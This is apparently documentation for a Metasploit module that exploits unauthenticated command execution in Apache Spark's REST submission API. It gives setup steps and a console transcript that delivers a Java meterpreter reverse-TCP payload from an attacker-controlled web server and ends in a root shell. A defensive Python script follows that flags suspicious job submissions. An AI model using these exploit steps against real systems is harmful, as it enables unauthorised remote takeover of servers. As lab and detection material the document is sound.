## Description

This module exploits an unauthenticated command execution vulnerability in Apache Spark in standalone cluster mode, through the REST API. It uses the function `CreateSubmissionRequest` to submit a malicious Java class and trigger it.

## Vulnerable Application

https://github.com/vulhub/vulhub/tree/master/spark/unacc

`docker-compose up -d`

## Verification Steps

1. Get session on target
2. `use exploit/linux/http/spark_unauth_rce`
3. `set payload`
4. `set rhosts`
5. `set rport`
6. `set srvhost`
7. `set srvport`
8. `set lport`
9. `set lhost`
10. `exploit`

## Scenarios

### Spark 2.3.1

```
msf5 > use exploit/linux/http/spark_unauth_rce
msf5 exploit(linux/http/spark_unauth_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(linux/http/spark_unauth_rce) > set rport 6066
rport => 6066
msf5 exploit(linux/http/spark_unauth_rce) > set srvhost 10.139.14.167
srvhost => 10.139.14.167
msf5 exploit(linux/http/spark_unauth_rce) > set srvport 9999
srvport => 9999
msf5 exploit(linux/http/spark_unauth_rce) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf5 exploit(linux/http/spark_unauth_rce) > set lhost 10.139.14.167
lhost => 10.139.14.167
msf5 exploit(linux/http/spark_unauth_rce) > set lport 5555
lport => 5555
msf5 exploit(linux/http/spark_unauth_rce) > exploit
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.139.14.167:5555
msf5 exploit(linux/http/spark_unauth_rce) > [*] Starting up our web service ...
[*] Using URL: http://10.139.14.167:9999/feTYHNiHufrGI
[*] 127.0.0.1:6066 - Sending the payload to the server...
[*] Sending stage (53867 bytes) to 10.139.14.167
[*] Meterpreter session 2 opened (10.139.14.167:5555 -> 10.139.14.167:56021) at 2018-11-12 16:59:33 +0800

msf5 exploit(linux/http/apache_couchdb_cmd_exec) > sessions

Active sessions
===============

  Id  Name  Type                    Information          Connection
  --  ----  ----                    -----------          ----------
  2         meterpreter java/linux  root @ 96b2135aee9c  10.139.14.167:5555 -> 10.139.14.167:56021 (127.0.0.1)

msf5 exploit(linux/http/apache_couchdb_cmd_exec) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: root
meterpreter >
```
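A defender-side check for the submission path named in the Description, as an added example that is not part of the module or its documentation: it reviews captured requests to the REST submission port and flags job submissions that come from untrusted sources or that tell the cluster to download a jar from an unlisted host. The record layout (`src`, `method`, `path`, `body`), the allowlists and the sample records are assumptions constructed for illustration.

```python
import ipaddress
import json
from urllib.parse import urlsplit

# Assumed site policy (hypothetical values): who may submit jobs, where jars may live.
TRUSTED_SUBMITTERS = [ipaddress.ip_network("10.20.0.0/24")]
TRUSTED_JAR_HOSTS = {"artifacts.internal.example"}

def remote_jar_hosts(body):
    """Hosts of jars that a submission asks the cluster to download."""
    props = body.get("sparkProperties") or {}
    refs = [str(body.get("appResource", ""))] + str(props.get("spark.jars", "")).split(",")
    hosts = []
    for ref in refs:
        try:
            url = urlsplit(ref.strip())
        except ValueError:  # malformed URL, e.g. a broken IPv6 literal
            continue
        if url.scheme.lower() in ("http", "https", "ftp") and url.hostname:
            hosts.append(url.hostname)
    return hosts

def review_request(record):
    """Findings for one captured request to the submission port."""
    if record["method"] != "POST" or not record["path"].startswith("/v1/submissions/create"):
        return []
    findings = []
    if not any(ipaddress.ip_address(record["src"]) in net for net in TRUSTED_SUBMITTERS):
        findings.append("submission from untrusted source " + record["src"])
    try:
        body = json.loads(record["body"])
    except ValueError:
        body = None
    if not isinstance(body, dict):
        return findings + ["unparseable submission body"]
    for host in remote_jar_hosts(body):
        if host not in TRUSTED_JAR_HOSTS:
            findings.append("jar fetched from unlisted host " + host)
    return findings

SAMPLE = [  # constructed records, not real traffic
    {"src": "10.20.0.15", "method": "POST", "path": "/v1/submissions/create",
     "body": '{"action": "CreateSubmissionRequest", "appResource": "hdfs:///jobs/etl.jar"}'},
    {"src": "203.0.113.9", "method": "POST", "path": "/v1/submissions/create",
     "body": '{"action": "CreateSubmissionRequest", "appResource": "http://203.0.113.9:9999/a.jar"}'},
    {"src": "10.20.0.15", "method": "GET", "path": "/v1/submissions/status/driver-1", "body": ""},
]

if __name__ == "__main__":
    print([review_request(r) for r in SAMPLE])
```

Because the REST submission server has no authentication of its own, findings from a check like this are a backstop; the primary control is restricting network access to the submission port to hosts trusted to submit jobs.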